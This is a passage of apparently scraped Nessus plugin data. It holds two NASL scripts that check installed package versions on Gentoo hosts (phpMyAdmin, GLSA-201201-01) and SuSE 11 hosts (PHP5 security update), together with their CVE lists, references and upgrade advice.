Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57433);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(37826, 42584, 42591, 42874, 46359, 48563, 48874, 50175, 50497, 51099, 51166, 51226);\n script_xref(name:\"GLSA\", value:\"201201-01\");\n script_xref(name:\"TRA\", value:\"TRA-2010-02\");\n\n script_name(english:\"GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201201-01\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers and phpMyAdmin Security Advisories referenced\n below for details.\n \nImpact :\n\n Remote attackers might be able to insert and execute PHP code, include\n and execute local PHP files, or perform Cross-Site Scripting (XSS)\n attacks via various vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-4/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-10/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-11/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-12/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-17/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-18/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-9/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201201-01\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2010-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 3.4.9\"), vulnerable:make_list(\"lt 3.4.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:42", "description": "PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "nessus", "title": "SuSE 11 / 11.1 Security Update : Apache 2 (SAT Patch Numbers 2880 / 2881)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:11:php5", "p-cpe:/a:novell:suse_linux:11:php5-bcmath", "p-cpe:/a:novell:suse_linux:11:php5-bz2", "p-cpe:/a:novell:suse_linux:11:php5-calendar", "p-cpe:/a:novell:suse_linux:11:php5-ldap", "p-cpe:/a:novell:suse_linux:11:php5-ctype", "p-cpe:/a:novell:suse_linux:11:php5-mbstring", "p-cpe:/a:novell:suse_linux:11:php5-curl", "p-cpe:/a:novell:suse_linux:11:php5-mcrypt", "p-cpe:/a:novell:suse_linux:11:php5-mysql", "p-cpe:/a:novell:suse_linux:11:php5-dba", "p-cpe:/a:novell:suse_linux:11:php5-odbc", "p-cpe:/a:novell:suse_linux:11:php5-openssl", "p-cpe:/a:novell:suse_linux:11:php5-pcntl", "p-cpe:/a:novell:suse_linux:11:php5-pdo", "p-cpe:/a:novell:suse_linux:11:php5-pear", "p-cpe:/a:novell:suse_linux:11:php5-dbase", "p-cpe:/a:novell:suse_linux:11:php5-pgsql", "p-cpe:/a:novell:suse_linux:11:php5-pspell", "p-cpe:/a:novell:suse_linux:11:php5-shmop", "p-cpe:/a:novell:suse_linux:11:php5-snmp", "p-cpe:/a:novell:suse_linux:11:php5-soap", "p-cpe:/a:novell:suse_linux:11:php5-suhosin", "p-cpe:/a:novell:suse_linux:11:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php5-sysvsem", "p-cpe:/a:novell:suse_linux:11:php5-sysvshm", "p-cpe:/a:novell:suse_linux:11:php5-tokenizer", "p-cpe:/a:novell:suse_linux:11:php5-wddx", "p-cpe:/a:novell:suse_linux:11:php5-xmlreader", "p-cpe:/a:novell:suse_linux:11:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php5-xsl", "p-cpe:/a:novell:suse_linux:11:php5-zip", "p-cpe:/a:novell:suse_linux:11:php5-zlib", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php5-dom", "p-cpe:/a:novell:suse_linux:11:php5-exif", "p-cpe:/a:novell:suse_linux:11:php5-fastcgi", "p-cpe:/a:novell:suse_linux:11:php5-ftp", "p-cpe:/a:novell:suse_linux:11:php5-gd", "p-cpe:/a:novell:suse_linux:11:php5-gettext", "p-cpe:/a:novell:suse_linux:11:php5-gmp", "p-cpe:/a:novell:suse_linux:11:php5-hash", "p-cpe:/a:novell:suse_linux:11:php5-iconv", "p-cpe:/a:novell:suse_linux:11:php5-json"], "id": "SUSE_11_APACHE2-MOD_PHP5-100805.NASL", "href": "https://www.tenable.com/plugins/nessus/50890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50890);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Apache 2 (SAT Patch Numbers 2880 / 2881)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=588975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0397.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1860.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1862.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1864.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1866.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1914.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1915.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1917.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2093.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2094.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2097.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2100.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2101.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2190.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2191.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2225.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2484.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2531.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3065.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2880 / 2881 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"apache2-mod_php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bcmath-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bz2-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-calendar-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ctype-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-curl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dba-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dbase-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dom-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-exif-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-fastcgi-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ftp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gd-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gettext-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-hash-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-iconv-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-json-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ldap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mbstring-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mcrypt-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mysql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-odbc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-openssl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pcntl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pdo-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pear-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pgsql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pspell-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-shmop-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-snmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-soap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-suhosin-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvmsg-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvsem-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvshm-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-tokenizer-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-wddx-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlreader-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlrpc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlwriter-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xsl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zip-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zlib-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-mod_php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bcmath-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bz2-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-calendar-5.2.14-0.1.1\")) 